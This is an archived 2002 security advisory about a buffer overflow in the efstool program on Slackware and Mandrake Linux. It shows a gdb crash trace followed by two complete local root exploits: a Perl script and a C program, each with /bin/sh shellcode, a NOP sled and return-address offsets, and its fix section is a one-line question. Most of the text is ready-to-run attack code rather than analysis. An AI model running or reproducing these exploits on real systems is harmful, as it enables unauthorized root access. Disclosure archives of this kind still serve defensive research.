Redirecting
1st Jul 2002 [SBWID-5494]
COMMAND
efstool local root exploit (buffer overflow)
SYSTEMS AFFECTED
slackware 8, mandrake 8, mandrake 7.1
PROBLEM
clorox 'max' says :
An error in the efstool program on redhat, mandrake, and slackware is
able to be successfully exploited through a buffer overflow.
[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
Segmentation fault
[clorox@ptnw clorox]$ gdb efstool
GNU gdb 5.1.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...(no debugging symbols
found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)
Example
=======
#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000
$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";
$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";
if ($ARGV[1] eq "m1") {
$len = 3000;
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
$len = 10010;
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode2;
} else {
print "You must specify a method fool!\n";
print "perl $0 <offset> m1 or m2\n";
}
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
-Or-
/* efstool.c - efstool/bof simple overflow in efstool,
*
*
* This code is published propterty of CloudAss, you may
* duplicate this in any shape or form without prior written
* permission from CloudAss.
*
* Bug discovered by ntfx, just figured I'd code a decent
* exploit for it.
*
*
* DISCLAIMER - I am in no way affiliated with ntfx or any members of
* soldierx or legion2002 security.
*
* Usage: ./efsroot offset - bruteforce if neccesary
*
* Bug is pretty stupid, and simple, I have yet to see it give root.
* efstool is not +s on slackware 8.0 , it should spawn a shell
* regardless.
*
* (C) COPYRIGHT CloudAss , 2002
* all rights reserved
***********************************************************************
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"
//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;
offset = atoi(argv[1]);
retaddr = get_esp() + offset;
for(i=0; i < SIZE; i+=4)
*(long *)&buffer[i] = retaddr;
for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;
memcpy(buffer+i, shellcode, strlen(shellcode));
execl(PATH, "efstool", buffer, 0);
return 0;
}
SOLUTION
Updated package available ?
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
